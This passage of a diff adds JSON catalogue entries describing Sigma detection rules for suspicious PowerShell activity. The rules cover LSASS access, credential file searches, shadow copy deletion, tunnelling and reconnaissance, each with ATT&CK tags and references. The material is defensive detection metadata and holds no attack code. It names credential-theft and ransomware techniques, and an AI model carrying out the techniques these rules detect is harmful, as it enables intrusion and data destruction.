"falsepositive": [ + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "uuid": "bd5971a7-626d-46ab-8176-ed643f694f68", + "value": "Extracting Information with PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ], + "creation_date": "2021/12/19", + "filename": "posh_ps_susp_extracting.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", + "value": "Troubleshooting Pack Cmdlet Execution", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1537919885031772161", + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/06/21", + "filename": 
"posh_ps_susp_follina_execution.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "value": "PowerShell Get-Process LSASS in ScriptBlock", + "meta": { + "refs": [ + "https://twitter.com/PythonResponder/status/1385064506049630211", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2021/04/23", + "filename": "posh_ps_susp_getprocess_lsass.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Powershell code that execute COM Objects", + "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", + "value": "Suspicious GetTypeFromCLSID ShellExecute", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2022/04/02", + "filename": "posh_ps_susp_gettypefromclsid.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + 
"logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", + "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", + "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1201" + ], + "creation_date": "2022/03/17", + "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of PowerShell to identify the current logged user.", + "uuid": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", + "value": "Suspicious PowerShell Get Current User", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": 
"2022/04/04", + "filename": "posh_ps_susp_get_current_user.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", + "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", + "value": "Suspicious GPO Discovery With Get-GPO", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1615" + ], + "creation_date": "2022/06/04", + "filename": "posh_ps_susp_get_gpo.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Get the processes that are running on the local computer.", + "uuid": "af4c87ce-bdda-4215-b998-15220772e993", + "value": "Suspicious Process Discovery With Get-Process", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ], + "creation_date": "2022/03/17", + "filename": "posh_ps_susp_get_process.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + 
"logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "uuid": "0332a266-b584-47b4-933d-a00b103e1b37", + "value": "Suspicious Get-WmiObject", + "meta": { + "refs": [ + "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546" + ], + "creation_date": "2022/01/12", + "filename": "posh_ps_susp_gwmi.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "value": "Suspicious Hyper-V Cmdlets", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.006" + ], + "creation_date": "2022/04/09", + "filename": "posh_ps_susp_hyper_v_condlet.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects 
suspicious PowerShell invocation command parameters", + "uuid": "ed965133-513f-41d9-a441-e38076a0798f", + "value": "Suspicious PowerShell Invocations - Generic", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/12", + "filename": "posh_ps_susp_invocation_generic.yml", + "author": "Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Very special / sneaky PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "value": "Suspicious PowerShell Invocations - Specific", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_ps_susp_invocation_specific.yml", + "author": "Florian Roth (rule), Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", + "value": "Change User Agents with WebRequest", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2022/01/23", + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "value": "Suspicious IO.FileStream", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ], + "creation_date": "2022/01/09", + "filename": "posh_ps_susp_iofilestream.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", + "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", + "value": "Suspicious PowerShell Keywords", + "meta": { + "refs": [ + "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", + "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", + "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/02/11", + "filename": "posh_ps_susp_keywords.yml", + "author": "Florian Roth, Perez Diego (@darkquassar)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "value": "Suspicious Get Local Groups Information - PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/12", + "filename": "posh_ps_susp_local_group_reco.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", + "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "value": "Powershell Local Email Collection", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114.001" + ], + "creation_date": "2021/07/21", + "filename": "posh_ps_susp_mail_acces.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", + "value": "PowerShell Deleted Mounted Share", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ], + "creation_date": "2020/10/08", + "filename": "posh_ps_susp_mounted_share_deletion.yml", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "level": "medium", + "falsepositive": [ + "Administrators or Power users may remove their shares via cmd line" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", + "value": "Suspicious Mount-DiskImage", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", + 
"https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ], + "creation_date": "2022/02/01", + "filename": "posh_ps_susp_mount_diskimage.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", + "uuid": "1883444f-084b-419b-ac62-e0d0c5b3693f", + "value": "Suspicious Connection to Remote Account", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.001" + ], + "creation_date": "2021/12/27", + "filename": "posh_ps_susp_networkcredential.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). 
The adversary may then perform actions as the logged-on user.", + "uuid": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "value": "Suspicious New-PSDrive to Admin Share", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2022/08/13", + "filename": "posh_ps_susp_new_psdrive.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", + "value": "Suspicious TCP Tunnel Via PowerShell Script", + "meta": { + "refs": [ + "https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2022/07/08", + "filename": "posh_ps_susp_proxy_scripts.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", + "value": "Recon Information for Export with PowerShell", + "meta": 
{ + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ], + "creation_date": "2021/07/30", + "filename": "posh_ps_susp_recon_export.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", + "value": "Remove Account From Domain Admin Group", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ], + "creation_date": "2021/12/26", + "filename": "posh_ps_susp_remove_adgroupmember.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "uuid": "22d80745-6f2c-46da-826b-77adaededd74", + "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "meta": { + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ], + "creation_date": "2022/10/24", + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Rare intended use of hidden services", + "Rare FP could occure due to the non linearity of the ScriptBlockText log" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", + "value": "Suspicious Get Information for SMB Share", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/15", + "filename": "posh_ps_susp_smb_share_reco.yml", + "author": "frack113", + "level": "low", + 
"falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.",
+ "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078",
+ "value": "Suspicious SSL Connection",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2",
+ "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1573"
+ ],
+ "creation_date": "2022/01/23",
+ "filename": "posh_ps_susp_ssl_keyword.yml",
+ "author": "frack113",
+ "level": "low",
+ "falsepositive": [
+ "Legitimate administrative script"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Powershell use PassThru option to start in background",
+ "uuid": "0718cd72-f316-4aa2-988f-838ea8533277",
+ "value": "Suspicious Start-Process PassThru",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.003"
+ ],
+ "creation_date": "2022/01/15",
+ "filename": "posh_ps_susp_start_process.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate PowerShell scripts"
+ ],
+ 
"logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.",
+ "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d",
+ "value": "Suspicious Unblock-File",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1553.005"
+ ],
+ "creation_date": "2022/02/01",
+ "filename": "posh_ps_susp_unblock_file.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate PowerShell scripts"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n",
+ "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287",
+ "value": "Replace Desktop Wallpaper by Powershell",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1491.001"
+ ],
+ "creation_date": "2021/12/26",
+ "filename": "posh_ps_susp_wallpaper.yml",
+ "author": "frack113",
+ "level": "low",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "ps_script",
+ 
"logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.",
+ "uuid": "b26647de-4feb-4283-af6b-6117661283c5",
+ "value": "Powershell Suspicious Win32_PnPEntity",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1120"
+ ],
+ "creation_date": "2021/08/23",
+ "filename": "posh_ps_susp_win32_pnpentity.yml",
+ "author": "frack113",
+ "level": "low",
+ "falsepositive": [
+ "Admin script"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil",
+ "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e",
+ "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1490"
+ ],
+ "creation_date": "2021/12/26",
+ "filename": "posh_ps_susp_win32_shadowcopy.yml",
+ "author": "frack113",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil",
+ "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42",
+ "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell",
+ "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1490"
+ ],
+ "creation_date": "2022/09/20",
+ "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml",
+ "author": "Tim Rauch",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "ps_script",
